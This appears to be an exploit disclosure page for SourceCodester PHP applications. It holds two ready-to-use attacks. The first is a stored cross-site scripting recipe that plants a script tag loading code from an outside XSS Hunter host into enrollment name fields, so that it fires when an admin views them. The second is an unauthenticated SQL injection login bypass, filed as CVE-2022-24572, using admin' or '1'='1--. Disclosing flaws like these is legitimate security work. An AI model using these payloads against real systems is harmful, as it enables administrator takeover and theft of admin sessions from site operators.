\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`To Exploit\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

Step 1: Goto Enrollment Page

Step 2: Put XSS Hunter Payload on Either First Name or Last Name field

Step 3: Wait for Admin to view your details

Step 4: Then you will see xss fires alert on xss hunter page

Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

CVE-2022-24572: OpenSource/exploit_xss at main · nsparker1337/OpenSource

Car Driving School Management System v1.0 is affected by SQL injection in the login page. An attacker can use simple SQL login injection payload to get admin access.

\# Exploit Title: Car Driving School management System v1.0 - Unauthenticated Blind SQL Injection

\# Exploit Author: NS Kumar (n1\_x)

\# Date: January 31, 2022

\# Vendor Homepage: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

\# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cdsms\_1.zip

\# Tested on: Parrot Linux, Apache, Mysql

\# Vendor: oretnom23

\# Version: v1.0

\# Exploit Description:

\# Car Driving School management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to gain admin access.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\` To Exploit\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

Step 1: Goto Login Page.

Step 2: Put the Payload admin' or '1'='1-- and Leave password field blank, then click Login button.

Step 3: Now you can Access the Admin Dashboard.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

Tag

#apache